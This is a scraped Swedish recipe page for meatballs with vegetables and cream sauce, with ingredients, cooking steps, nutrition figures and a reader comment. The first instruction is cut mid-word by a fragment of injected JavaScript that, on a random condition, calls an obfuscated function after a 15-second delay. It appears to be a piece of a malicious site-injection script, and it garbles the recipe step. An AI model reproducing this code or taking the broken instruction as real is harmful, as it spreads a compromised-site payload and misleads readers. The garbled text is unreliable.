Köttbullar med grönsaker och gräddsås

2013-08-29
imageimage
  • Yield : 17
  • Servings : 4
  • Prep Time : 10m
  • Cook Time : 15m
  • Ready In : 25m

Ingredienser

    • 400 g Nötfärs
    • 1 Gullök
    • 3 dl Mellangrädde 27 %
    • 1 Tomat
    • 1,5 Gurka
    • 200 g frysta grönsaker
      (Broccoli, Blomkål, Morötter, Harrikovert
    • 4 Vitlöksklyftor
    • 1 Köttbuljongtärning
    • Salt & Peppar

Gör så här:

Blandandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}a köttfärsen i en bunke tillsammans med
lite salt och peppar. Pressa i vitlöken
Stek köttbullarna så de får färg.
Häll i grädden i stekpannan och låt stå
och puttra en stund på låg värme

Krydda såsen med lite salt, peppar och smula ner
buljongtärningen.

Om du vill att såsen ska bli lite tjockare
kan du reda den med maijzena.

Skiva grönsakerna och koka de frysta grönsakerna i
ca 5 min.

Medlemsbetyg

(5 / 5)

5 5 3
Betygsätt recept

3 people rated this recipe

Related Recipes:
  • _SAM0905

    Sallad på svartvitlöks rostad pumpa, lök, paprika, tomat med chevreost, spenat och svartkålschips.

  • Avokado & äggmacka

    Avokado & äggmacka

  • _SAM0358

    Havre, chokladpudding. Frukost kicken.

  • image

    Fisksoppa med smak av tomat och vitlök

  • _SAM0254

    Groddslaw med kalkon

Näringssinnehåll

Informationen gäller per portion

  • Kcal

    459
  • Protein

    24 g
  • Kolhydrater

    15,8 g
  • Fett

    34 g

Recipe Comments

  1. posted by Christian on 03/03/2014

    Dina recept är fucking kickass!
    nyttiga men asgoda, säg mig, vill du bli min fru?
    du lagar maten.. alltid. så byter jag rulle på toaletten, ok?
    nä men tack så hjärtligt jenny, du har en jävla talang. vilket jag inte associerar till söta tjejer.
    fördomar slås ner dag efter dag, well done.

      Reply

Post A Comment

Current ye@r *